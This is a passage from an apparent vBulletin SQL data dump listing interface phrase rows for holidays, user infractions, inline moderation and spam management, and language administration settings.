has been replaced with the following: {2}
You may edit the replacement link name below.', 'vbulletin', '', 0, ''),
(36079, -1, 'topic', 'help_faq', 'Topic', 'vbulletin', '', 0, ''),
(36080, -1, 'topic_manager', 'help_faq', 'Topic Manager', 'vbulletin', '', 0, ''),
(36081, -1, 'ash_wednesday', 'holiday', 'Ash Wednesday', 'vbulletin', '', 0, ''),
(36082, -1, 'ash_wednesday_desc', 'holiday', 'Ash Wednesday Holiday', 'vbulletin', '', 0, ''),
(36083, -1, 'corpus_christi', 'holiday', 'Corpus Christi', 'vbulletin', '', 0, ''),
(36084, -1, 'corpus_christi_desc', 'holiday', 'Corpus Christi Holiday', 'vbulletin', '', 0, ''),
(36085, -1, 'easter', 'holiday', 'Easter', 'vbulletin', '', 0, ''),
(36086, -1, 'easter_desc', 'holiday', 'Easter Holiday', 'vbulletin', '', 0, ''),
(36087, -1, 'event_x_to_y', 'holiday', '{1} to {2}', 'vbulletin', '', 0, ''),
(36088, -1, 'good_friday', 'holiday', 'Good Friday', 'vbulletin', '', 0, ''),
(36089, -1, 'good_friday_desc', 'holiday', 'Good Friday Holiday', 'vbulletin', '', 0, ''),
(36090, -1, 'holidays', 'holiday', 'Holidays', 'vbulletin', '', 0, ''),
(36091, -1, 'mardi_gras', 'holiday', 'Mardi Gras', 'vbulletin', '', 0, ''),
(36092, -1, 'mardi_gras_desc', 'holiday', 'Mardi Gras Holiday', 'vbulletin', '', 0, ''),
(36093, -1, 'palm_sunday', 'holiday', 'Palm Sunday', 'vbulletin', '', 0, ''),
(36094, -1, 'palm_sunday_desc', 'holiday', 'Palm Sunday Holiday', 'vbulletin', '', 0, ''),
(36095, -1, 'pentecost', 'holiday', 'Pentecost', 'vbulletin', '', 0, ''),
(36096, -1, 'pentecost_desc', 'holiday', 'Pentecost Holiday', 'vbulletin', '', 0, ''),
(36097, -1, 'active', 'infraction', 'Active', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36098, -1, 'active_infraction_x_points', 'infraction', 'Active Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055642, '3.7.2'),
(36099, -1, 'active_warning', 'infraction', 'Active Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36100, -1, 'add_new_automatic_ban', 'infraction', 'Add New Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157390518, '3.6.1'),
(36101, -1, 'add_new_user_infraction_group', 'infraction', 'Add New User Infraction Group', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36102, -1, 'administrative_note', 'infraction', 'Administrative Note', 'vbulletin', 'vBulletin Solutions', 1158273743, '3.6.2'),
(36103, -1, 'amount', 'infraction', 'Amount', 'vbulletin', 'vBulletin Solutions', 1157406198, '3.6.1'),
(36104, -1, 'are_you_sure_want_to_delete_infraction_x', 'infraction', 'Are you sure you want to delete Infraction {1}?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36105, -1, 'are_you_sure_you_want_to_delete_this_automatic_ban', 'infraction', 'Are you sure you want to delete this automatic ban?', 'vbulletin', 'vBulletin Solutions', 1157411113, '3.6.1'),
(36106, -1, 'are_you_sure_you_want_to_delete_this_infraction_group', 'infraction', 'Are you sure you want to delete this infraction group?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36107, -1, 'are_you_sure_you_want_to_delete_this_infraction_level', 'infraction', 'Are you sure you want to delete this infraction level?', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36108, -1, 'automatic_ban', 'infraction', 'Automatic Ban', 'vbulletin', 'vBulletin Solutions', 1157390535, '3.6.1'),
(36109, -1, 'automatic_bans', 'infraction', 'Automatic Bans', 'vbulletin', 'vBulletin Solutions', 1157397367, '3.6.1'),
(36110, -1, 'ban_usergroup', 'infraction', 'Ban Usergroup', 'vbulletin', 'vBulletin Solutions', 1157474207, '3.6.1'),
(36111, -1, 'current_infraction_groups', 'infraction', 'Current Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1153936508, '3.6.0 Release Candidate 3'),
(36112, -1, 'custom_infraction', 'infraction', 'Custom Infraction', 'vbulletin', 'vBulletin Solutions', 1149887781, '3.6.0 Beta 2'),
(36113, -1, 'discussion_thread', 'infraction', 'Discussion Thread', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36114, -1, 'expired', 'infraction', 'Expired', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36115, -1, 'expired_infraction_x_points', 'infraction', 'Expired Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055652, '3.7.2'),
(36116, -1, 'expired_warning', 'infraction', 'Expired Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36117, -1, 'expires', 'infraction', 'Expires', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36118, -1, 'extend', 'infraction', 'Extend', 'vbulletin', 'vBulletin Solutions', 1155926596, '3.6.1'),
(36119, -1, 'give_infraction', 'infraction', 'Give Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36120, -1, 'infraction', 'infraction', 'Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36121, -1, 'infraction_group', 'infraction', 'Infraction Group', 'vbulletin', 'vBulletin Solutions', 1157411315, '3.6.1'),
(36122, -1, 'infraction_level', 'infraction', 'Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36123, -1, 'infraction_reason', 'infraction', 'Infraction Reason', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36124, -1, 'infraction_received', 'infraction', 'Infraction Received: {1}', 'vbulletin', 'vBulletin Solutions', 1149109875, '3.6.0 Beta 1'),
(36125, -1, 'infraction_statistics', 'infraction', 'Infraction Statistics', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36126, -1, 'infraction_type', 'infraction', 'Type', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36127, -1, 'infraction_view', 'infraction', 'View', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36128, -1, 'infraction_viewer_page_x_y_there_are_z_total_log_entries', 'infraction', 'Infraction Viewer (page {1}/{2}) | There are {3} total entries.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36129, -1, 'infraction_x_y', 'infraction', 'Infraction for {1}: {2}', 'vbulletin', 'vBulletin Solutions', 1149101904, '3.6.0 Beta 1'),
(36130, -1, 'infractions_active_total', 'infraction', 'Infractions (Active / Total)', 'vbulletin', 'vBulletin Solutions', 1157484897, '3.6.1'),
(36131, -1, 'left_by', 'infraction', 'Left By', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36132, -1, 'leftby_infraction', 'infraction', 'Left By', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36133, -1, 'leftfor_infraction', 'infraction', 'Left For', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36134, -1, 'message_to_user', 'infraction', 'Message to User', 'vbulletin', 'vBulletin Solutions', 1158273723, '3.6.2'),
(36135, -1, 'method', 'infraction', 'Method', 'vbulletin', 'vBulletin Solutions', 1157406209, '3.6.1'),
(36136, -1, 'no_title', 'infraction', '<No Title>', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36137, -1, 'order_by_expiration', 'infraction', 'Order by Expiration', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36138, -1, 'order_by_points', 'infraction', 'Order by Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36139, -1, 'override_display', 'infraction', 'Override Display', 'vbulletin', 'vBulletin Solutions', 1153845761, '3.6.0 Release Candidate 3'),
(36140, -1, 'override_usergroup', 'infraction', 'Override Usergroup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36141, -1, 'override_with_permissions', 'infraction', 'Override with Permissions from Usergroup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36142, -1, 'points', 'infraction', 'Points', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36143, -1, 'possible_infraction_groups', 'infraction', 'Possible Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1150196731, '3.6.0 Beta 2'),
(36144, -1, 'removal_of_this_infraction', 'infraction', 'Removal of this infraction will remove the infraction points that were incurred for this offense and decrease the user\'s infractions/warnings total.', 'vbulletin', 'vBulletin Solutions', 1154953668, '3.6.1'),
(36145, -1, 'reversal_reason', 'infraction', 'Reversal Reason', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36146, -1, 'reverse', 'infraction', 'Reverse', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36147, -1, 'reverse_infraction', 'infraction', 'Reverse Infraction/Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36148, -1, 'reverse_this_infraction', 'infraction', 'Reverse this Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36149, -1, 'reverse_this_warning', 'infraction', 'Reverse this Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36150, -1, 'reversed', 'infraction', 'Reversed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36151, -1, 'reversed_infraction_x_points', 'infraction', 'Reversed Infraction (Points: {1})', 'vbulletin', 'vBulletin Solutions', 1212055665, '3.7.2'),
(36152, -1, 'reversed_warning', 'infraction', 'Reversed Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36153, -1, 'status', 'infraction', 'Status', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36154, -1, 'to_reverse_this_infraction', 'infraction', 'To reverse this warning/infraction, click this box and press the \'Reverse\' button.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36155, -1, 'user_infraction', 'infraction', 'User Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36156, -1, 'user_infraction_for_x', 'infraction', 'User Infraction for {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36157, -1, 'user_infraction_groups', 'infraction', 'User Infraction Groups', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36158, -1, 'user_infraction_level', 'infraction', 'User Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36159, -1, 'user_infraction_levels', 'infraction', 'User Infraction Levels', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36160, -1, 'user_infraction_manager', 'infraction', 'User Infraction Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36161, -1, 'view_infraction', 'infraction', 'View Infraction/Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36162, -1, 'view_infractions', 'infraction', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36163, -1, 'warning', 'infraction', 'Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36164, -1, 'warning_only', 'infraction', 'Warning Only', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36165, -1, 'warning_received', 'infraction', 'Warning Received: {1}', 'vbulletin', 'vBulletin Solutions', 1149109883, '3.6.0 Beta 1'),
(36166, -1, 'warning_x_y', 'infraction', 'Warning for {1}: {2}', 'vbulletin', 'vBulletin Solutions', 1149101914, '3.6.0 Beta 1'),
(36167, -1, 'warnings', 'infraction', 'Warnings', 'vbulletin', 'vBulletin Solutions', 1149805562, '3.6.0 Beta 2'),
(36168, -1, 'x_days', 'infraction', '{1} Day(s)', 'vbulletin', 'vBulletin Solutions', 1157409423, '3.6.1'),
(36169, -1, 'x_hours', 'infraction', '{1} Hour(s)', 'vbulletin', 'vBulletin Solutions', 1157409433, '3.6.1'),
(36170, -1, 'x_months', 'infraction', '{1} Month(s)', 'vbulletin', 'vBulletin Solutions', 1157409416, '3.6.1'),
(36171, -1, 'x_weeks', 'infraction', '{1} Week(s)', 'vbulletin', 'vBulletin Solutions', 1157409407, '3.6.1'),
(36172, -1, 'x_y_points', 'infraction', '{1} - {2} Point(s)', 'vbulletin', 'vBulletin Solutions', 1150140161, '3.6.0 Beta 2'),
(36173, -1, 'x_years', 'infraction', '{1} Year(s)', 'vbulletin', 'vBulletin Solutions', 1157409400, '3.6.1'),
(36174, -1, 'affected_ips', 'inlinemod', 'Affected IP Addresses', 'vbulletin', 'vBulletin Solutions', 1190301644, '3.7.0 Beta 1'),
(36175, -1, 'affected_ips_are', 'inlinemod', 'The IP addresses used to post the spam are:', 'vbulletin', 'vBulletin Solutions', 1190301574, '3.7.0 Beta 1'),
(36176, -1, 'affected_users', 'inlinemod', 'Affected Users', 'vbulletin', 'vBulletin Solutions', 1190298826, '3.7.0 Beta 1'),
(36177, -1, 'affected_users_are', 'inlinemod', 'The user(s) who posted the spam are:', 'vbulletin', 'vBulletin Solutions', 1190301653, '3.7.0 Beta 1'),
(36178, -1, 'apply_selected_action_to_other_users_sharing_ips', 'inlinemod', 'Apply the selected action to other users registered with or posting from the affected IP addresses', 'vbulletin', 'vBulletin Solutions', 1190369794, '3.7.0 Beta 1'),
(36179, -1, 'applying_punitive_action_to', 'inlinemod', 'Applying Punitive Action To', 'vbulletin', 'vBulletin Solutions', 1192466961, '3.7.0 Beta 1'),
(36180, -1, 'approve_attachments', 'inlinemod', 'Approve Attachments', 'vbulletin', '', 0, ''),
(36181, -1, 'approve_pictures', 'inlinemod', 'Approve Pictures', 'vbulletin', 'vBulletin Solutions', 1203712911, '3.7.0 Beta 6'),
(36182, -1, 'approve_posts', 'inlinemod', 'Approve Posts', 'vbulletin', '', 0, ''),
(36183, -1, 'approve_threads', 'inlinemod', 'Approve Threads', 'vbulletin', '', 0, ''),
(36184, -1, 'asterisk_items_require_further_confirmation', 'inlinemod', 'Options marked with an asterisk (* ) will cause a further confirmation page to be loaded before any action is taken.', 'vbulletin', 'vBulletin Solutions', 1190293353, '3.7.0 Beta 1'),
(36185, -1, 'ban_spam_ips', 'inlinemod', 'Ban the IP addresses used to post this spam', 'vbulletin', 'vBulletin Solutions', 1190293245, '3.7.0 Beta 1'),
(36186, -1, 'ban_users', 'inlinemod', 'Ban these users', 'vbulletin', 'vBulletin Solutions', 1190293002, '3.7.0 Beta 1'),
(36187, -1, 'clear_post_list', 'inlinemod', 'Deselect All Posts', 'vbulletin', '', 0, ''),
(36188, -1, 'clear_thread_list', 'inlinemod', 'Deselect All Threads', 'vbulletin', '', 0, ''),
(36189, -1, 'close_threads', 'inlinemod', 'Close Threads', 'vbulletin', '', 0, ''),
(36190, -1, 'copy_posts', 'inlinemod', 'Copy Posts', 'vbulletin', 'vBulletin Solutions', 1145563688, '3.6.0 Beta 1'),
(36191, -1, 'delete_discussions', 'inlinemod', 'Delete Discussions', 'vbulletin', 'vBulletin Solutions', 1212060899, '3.7.1'),
(36192, -1, 'delete_messages', 'inlinemod', 'Delete Messages', 'vbulletin', 'vBulletin Solutions', 1197984045, '3.7.0 Beta 3'),
(36193, -1, 'delete_other_posts_and_threads_by_affected_users', 'inlinemod', 'Delete other posts and threads started by the affected users', 'vbulletin', 'vBulletin Solutions', 1190385213, '3.7.0 Beta 1'),
(36194, -1, 'delete_pictures', 'inlinemod', 'Delete Pictures', 'vbulletin', 'vBulletin Solutions', 1203712901, '3.7.0 Beta 6'),
(36195, -1, 'delete_posts_as_spam', 'inlinemod', 'Delete Posts as Spam', 'vbulletin', 'vBulletin Solutions', 1190119722, '3.7.0 Beta 1'),
(36196, -1, 'delete_spam', 'inlinemod', 'Delete Spam', 'vbulletin', 'vBulletin Solutions', 1190293750, '3.7.0 Beta 1'),
(36197, -1, 'delete_threads', 'inlinemod', 'Delete Threads', 'vbulletin', '', 0, ''),
(36198, -1, 'delete_threads_as_spam', 'inlinemod', 'Delete Threads as Spam', 'vbulletin', 'vBulletin Solutions', 1190119750, '3.7.0 Beta 1'),
(36199, -1, 'deleting_the_first_message', 'inlinemod', 'Deleting the first message in a discussion will delete the discussion.', 'vbulletin', 'vBulletin Solutions', 1212063182, '3.7.1'),
(36200, -1, 'deleting_the_first_post', 'inlinemod', 'Deleting the first post of a thread will result in the deletion of the thread.', 'vbulletin', 'vBulletin Solutions', 1149865862, '3.6.0 Beta 2'),
(36201, -1, 'deleting_x_discussions_from_y_social_groups', 'inlinemod', 'Deleting {1} discussions from {2} social group(s).', 'vbulletin', 'vBulletin Solutions', 1212061573, '3.7.1'),
(36202, -1, 'deleting_x_messages_from_y_pictures', 'inlinemod', 'Deleting {1} message(s) from {2} picture(s).', 'vbulletin', 'vBulletin Solutions', 1200331529, '3.7.0 Beta 4'),
(36203, -1, 'deleting_x_messages_from_y_user_profiles', 'inlinemod', 'Deleting {1} message(s) from {2} user profile(s).', 'vbulletin', 'vBulletin Solutions', 1191278998, '3.7.0 Beta 1'),
(36204, -1, 'deleting_x_messages_in_y_discussions_from_z_social_groups', 'inlinemod', 'Deleting {1} message(s) in {2} discussion(s) from {3} social group(s).', 'vbulletin', 'vBulletin Solutions', 1212061609, '3.7.1'),
(36205, -1, 'deleting_x_pictures_from_y_albums', 'inlinemod', 'Deleting {1} picture(s) from {2} album(s)', 'vbulletin', 'vBulletin Solutions', 1203724459, '3.7.0 Beta 6'),
(36206, -1, 'deselect_all', 'inlinemod', 'Deselect All', 'vbulletin', '', 0, ''),
(36207, -1, 'deselect_all_pictures', 'inlinemod', 'Deselect All Pictures', 'vbulletin', 'vBulletin Solutions', 1203715889, '3.7.0 Beta 6'),
(36208, -1, 'do_nothing', 'inlinemod', 'Do nothing', 'vbulletin', 'vBulletin Solutions', 1190293301, '3.7.0 Beta 1'),
(36209, -1, 'do_what_with_affected_users', 'inlinemod', 'What do you want to do to the {1} affected user(s)?', 'vbulletin', 'vBulletin Solutions', 1190301443, '3.7.0 Beta 1'),
(36210, -1, 'from_this_page', 'inlinemod', 'From This Page...', 'vbulletin', '', 0, ''),
(36211, -1, 'give_users_infraction', 'inlinemod', 'Give these users an infraction', 'vbulletin', 'vBulletin Solutions', 1190293120, '3.7.0 Beta 1'),
(36212, -1, 'invert_selection', 'inlinemod', 'Invert Selection', 'vbulletin', '', 0, ''),
(36213, -1, 'merge_posts', 'inlinemod', 'Merge Posts', 'vbulletin', '', 0, ''),
(36214, -1, 'merge_threads', 'inlinemod', 'Merge Threads', 'vbulletin', '', 0, ''),
(36215, -1, 'moderated_thread_prefix', 'inlinemod', 'Moderated:', 'vbulletin', '', 0, ''),
(36216, -1, 'moderation', 'inlinemod', 'Moderation', 'vbulletin', '', 0, ''),
(36217, -1, 'move_posts', 'inlinemod', 'Move Posts', 'vbulletin', '', 0, ''),
(36218, -1, 'move_threads', 'inlinemod', 'Move Threads', 'vbulletin', '', 0, ''),
(36219, -1, 'no_punitive_action_users_are_guests', 'inlinemod', 'All selected users are guests, therefore no punitive actions can be applied.', 'vbulletin', 'vBulletin Solutions', 1194873073, '3.7.0 Beta 1'),
(36220, -1, 'only_first_post_is_spam', 'inlinemod', 'Only the first post in each thread will be treated as spam. Any subsequent posts will be deleted, but will not be marked as spam.', 'vbulletin', 'vBulletin Solutions', 1190293392, '3.7.0 Beta 1'),
(36221, -1, 'open_threads', 'inlinemod', 'Open Threads', 'vbulletin', '', 0, ''),
(36222, -1, 'permanently_remove_items', 'inlinemod', 'Permanently remove items', 'vbulletin', 'vBulletin Solutions', 1190301099, '3.7.0 Beta 1'),
(36223, -1, 'place_ban_users_in', 'inlinemod', 'Place banned users in to', 'vbulletin', 'vBulletin Solutions', 1194524373, '3.7.0 Beta 1'),
(36224, -1, 'punitive_action', 'inlinemod', 'Punitive Action', 'vbulletin', 'vBulletin Solutions', 1190291662, '3.7.0 Beta 1'),
(36225, -1, 'punitive_actions_still_performed', 'inlinemod', 'All punitive actions that affected other users have still been performed.', 'vbulletin', 'vBulletin Solutions', 1199296524, '3.7.0 Beta 4'),
(36226, -1, 'registered_x_posts_y', 'inlinemod', 'Registered: {1}; Posts: {2}', 'vbulletin', 'vBulletin Solutions', 1190291273, '3.7.0 Beta 1'),
(36227, -1, 'save_users_from_punishment', 'inlinemod', 'You may save any of these users from punishment by removing the check next to their name', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'),
(36228, -1, 'select_all', 'inlinemod', 'Select All', 'vbulletin', '', 0, ''),
(36229, -1, 'select_closed_threads', 'inlinemod', 'Select Closed Threads', 'vbulletin', '', 0, ''),
(36230, -1, 'select_deleted_posts', 'inlinemod', 'Select Deleted Posts', 'vbulletin', '', 0, ''),
(36231, -1, 'select_deleted_threads', 'inlinemod', 'Select Deleted Threads', 'vbulletin', '', 0, ''),
(36232, -1, 'select_posts_from_guests', 'inlinemod', 'Select Posts from Guests ', 'vbulletin', '', 0, ''),
(36233, -1, 'select_posts_with_attachments', 'inlinemod', 'Select Posts with Attachments ', 'vbulletin', '', 0, ''),
(36234, -1, 'select_sticky_threads', 'inlinemod', 'Select Sticky Threads', 'vbulletin', '', 0, ''),
(36235, -1, 'select_threads_with_attachments', 'inlinemod', 'Select Threads with Attachments ', 'vbulletin', '', 0, ''),
(36236, -1, 'select_threads_with_polls', 'inlinemod', 'Select Threads with Polls ', 'vbulletin', '', 0, ''),
(36237, -1, 'select_unapproved_posts', 'inlinemod', 'Select Unapproved Posts', 'vbulletin', '', 0, ''),
(36238, -1, 'select_unapproved_threads', 'inlinemod', 'Select Unapproved Threads', 'vbulletin', '', 0, ''),
(36239, -1, 'spam_management', 'inlinemod', 'Spam Management', 'vbulletin', 'vBulletin Solutions', 1190112209, '3.6.8'),
(36240, -1, 'spam_management_remove_posts_warning', 'inlinemod', 'You will remove all posts for the selected users, those with more than {1} posts will need to be removed via the admin control panel.', 'vbulletin', 'vBulletin Solutions', 1192466988, '3.7.0 Beta 1'),
(36241, -1, 'stick_threads', 'inlinemod', 'Stick Threads', 'vbulletin', '', 0, ''),
(36242, -1, 'submit_data_to_antispam_service', 'inlinemod', 'Submit data to Anti-Spam Service', 'vbulletin', 'vBulletin Solutions', 1194870127, '3.7.0 Beta 1'),
(36243, -1, 'unapprove_attachments', 'inlinemod', 'Unapprove Attachments', 'vbulletin', '', 0, ''),
(36244, -1, 'unapprove_pictures', 'inlinemod', 'Unapprove Pictures', 'vbulletin', 'vBulletin Solutions', 1219150489, '3.8.0 Alpha 1'),
(36245, -1, 'unapprove_posts', 'inlinemod', 'Unapprove Posts', 'vbulletin', '', 0, ''),
(36246, -1, 'unapprove_threads', 'inlinemod', 'Unapprove Threads', 'vbulletin', '', 0, ''),
(36247, -1, 'undelete_posts', 'inlinemod', 'Undelete Posts', 'vbulletin', '', 0, ''),
(36248, -1, 'undelete_threads', 'inlinemod', 'Undelete Threads', 'vbulletin', '', 0, ''),
(36249, -1, 'unstick_threads', 'inlinemod', 'Unstick Threads', 'vbulletin', '', 0, ''),
(36250, -1, 'users_too_many_post_warning', 'inlinemod', 'The following users had more than 50 posts and these posts will need to be removed via the admin control panel.', 'vbulletin', 'vBulletin Solutions', 1199367812, '3.7.0 Beta 4'),
(36251, -1, 'view_selected_posts', 'inlinemod', 'View Selected Posts', 'vbulletin', 'vBulletin Solutions', 1147982193, '3.6.0 Beta 1'),
(36252, -1, 'view_selected_threads', 'inlinemod', 'View Selected Threads', 'vbulletin', 'vBulletin Solutions', 1147982202, '3.6.0 Beta 1'),
(36253, -1, 'x_y_by_z', 'inlinemod', '({1}) {2} by {3}', 'vbulletin', '', 0, ''),
(36254, -1, 'add_new_language', 'language', 'Add New Language', 'vbulletin', '', 0, ''),
(36255, -1, 'add_new_phrase', 'language', 'Add New Phrase', 'vbulletin', '', 0, ''),
(36256, -1, 'all_languages', 'language', 'All Languages', 'vbulletin', '', 0, ''),
(36257, -1, 'all_phrase_groups', 'language', 'ALL PHRASE GROUPS', 'vbulletin', '', 0, ''),
(36258, -1, 'all_products', 'language', 'All Products', 'vbulletin', 'vBulletin Solutions', 1172078028, '3.6.5'),
(36259, -1, 'are_you_sure_want_to_delete_language_x', 'language', 'Are you sure you want to delete the language called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36260, -1, 'are_you_sure_want_to_delete_phrase_x', 'language', 'Are you sure you want to delete the phrase called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36261, -1, 'calformat1_format_override', 'language', 'Birthday Date Format Override Use this to override the default birthday (with Year ) date format ', 'vbulletin', '', 0, ''),
(36262, -1, 'calformat2_format_override', 'language', 'Birthday Date Format Override Use this to override the default birthday (without Year ) date formatDO NOT put in a code for the year ', 'vbulletin', '', 0, ''),
(36263, -1, 'case_sensitive', 'language', 'Case-Sensitive', 'vbulletin', '', 0, ''),
(36264, -1, 'copy_default_text', 'language', 'Copy Default Text', 'vbulletin', '', 0, ''),
(36265, -1, 'create_new_language', 'language', 'Create New Language', 'vbulletin', '', 0, ''),
(36266, -1, 'creating_a_new_language_called_x', 'language', 'Creating a new language called \'{1} \'', 'vbulletin', '', 0, ''),
(36267, -1, 'custom_language', 'language', 'Custom Language', 'vbulletin', '', 0, ''),
(36268, -1, 'custom_phrase', 'language', 'Custom Phrase', 'vbulletin', '', 0, ''),
(36269, -1, 'date_format_override', 'language', 'Date Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime \r\nExamples: (if a locale is specified) \r\nEuropean Format (e.g., 25-04-98): %d-%m-%y \r\nDefault Date Format for this Locale: %x\r\n ', 'vbulletin', 'vBulletin Solutions', 1192528658, '3.7.0 Beta 1'),
(36270, -1, 'date_time_formatting', 'language', 'Date / Time FormattingIf a locale is defined, you must use the formatting found here , otherwise use the formatting found here ', 'vbulletin', '', 0, ''),
(36271, -1, 'decimal_separator', 'language', 'Decimal Separator (The character used to separate integers from floating point number components, such as the . used in 0.01. To specify a space, please use the underscore _ ) ', 'vbulletin', '', 0, ''),
(36272, -1, 'default_phrase_updated_desc', 'language', 'Default Phrase Updated in {1} by {2} \r\nYour Custom Phrase Last Edited in {3} by {4} ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36273, -1, 'default_text', 'language', 'Default Text', 'vbulletin', '', 0, ''),
(36274, -1, 'default_text_is_empty', 'language', 'Copying the default text would be tricky, as you haven\'t typed anything yet!', 'vbulletin', '', 0, ''),
(36275, -1, 'delete_all_orphans_notes', 'language', 'You have chosen to delete all orphan phrases. Click the button below to continue.', 'vbulletin', '', 0, ''),
(36276, -1, 'deleting_this_language_will_delete_custom_phrases', 'language', 'Deleting this language will delete any customized phrases you have created for this language.', 'vbulletin', '', 0, ''),
(36277, -1, 'download_upload_language', 'language', 'Download / Upload Language', 'vbulletin', '', 0, ''),
(36278, -1, 'edit_settings', 'language', 'Edit Settings', 'vbulletin', '', 0, ''),
(36279, -1, 'edit_translate_x_y_phrases', 'language', 'Edit / Translate {1} {2} Phrases', 'vbulletin', '', 0, ''),
(36280, -1, 'enable_directional_markup_fix', 'language', 'Enable Directional Markup Fix', 'vbulletin', '', 0, ''),
(36281, -1, 'find_and_replace_in_languages', 'language', 'Find and Replace in Languages', 'vbulletin', '', 0, ''),
(36282, -1, 'find_orphan_phrases', 'language', 'Find Orphan Phrases', 'vbulletin', '', 0, ''),
(36283, -1, 'find_updated_phrases', 'language', 'Find Updated Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36284, -1, 'general_settings', 'language', 'General Settings', 'vbulletin', '', 0, ''),
(36285, -1, 'html_charset', 'language', 'HTML Character Set\r\nThis is the value of the \'charset\' attribute for the HTML content type setting in the \'headinclude\' template. ', 'vbulletin', '', 0, ''),
(36286, -1, 'if_you_delete_this_phrase_translations_will_be_deleted', 'language', 'If you choose to delete this phrase, you will also lose any translated versions of the phrase in other language sets.', 'vbulletin', '', 0, ''),
(36287, -1, 'if_you_would_like_to_remove_this_phrase', 'language', 'If You Would Like to Remove this Phrase', 'vbulletin', '', 0, ''),
(36288, -1, 'ignore_language_version', 'language', 'Ignore Language Version Use language file even if it was created by a different version of vBulletin? ', 'vbulletin', '', 0, ''),
(36289, -1, 'image_folder_override', 'language', 'Button Images Folder Override\r\nUse this to override the button images folder associated with the style being used. By default, this folder is images/buttons. \r\nYou may use <#> to represent the style ID the user is currently using. ', 'vbulletin', 'vBulletin Solutions', 1216114920, '3.8.0 Alpha 1'),
(36290, -1, 'import_language_xml_file', 'language', 'Import Language XML File', 'vbulletin', '', 0, ''),
(36291, -1, 'importing_language', 'language', 'Importing Language', 'vbulletin', '', 0, ''),
(36292, -1, 'include_custom_phrases', 'language', 'Include Custom Phrases', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36293, -1, 'insert_into_master_language_developer_option', 'language', 'Insert into MASTER LANGUAGE (Developer Option) ', 'vbulletin', '', 0, ''),
(36294, -1, 'is_default_language', 'language', 'Is Default Language', 'vbulletin', '', 0, ''),
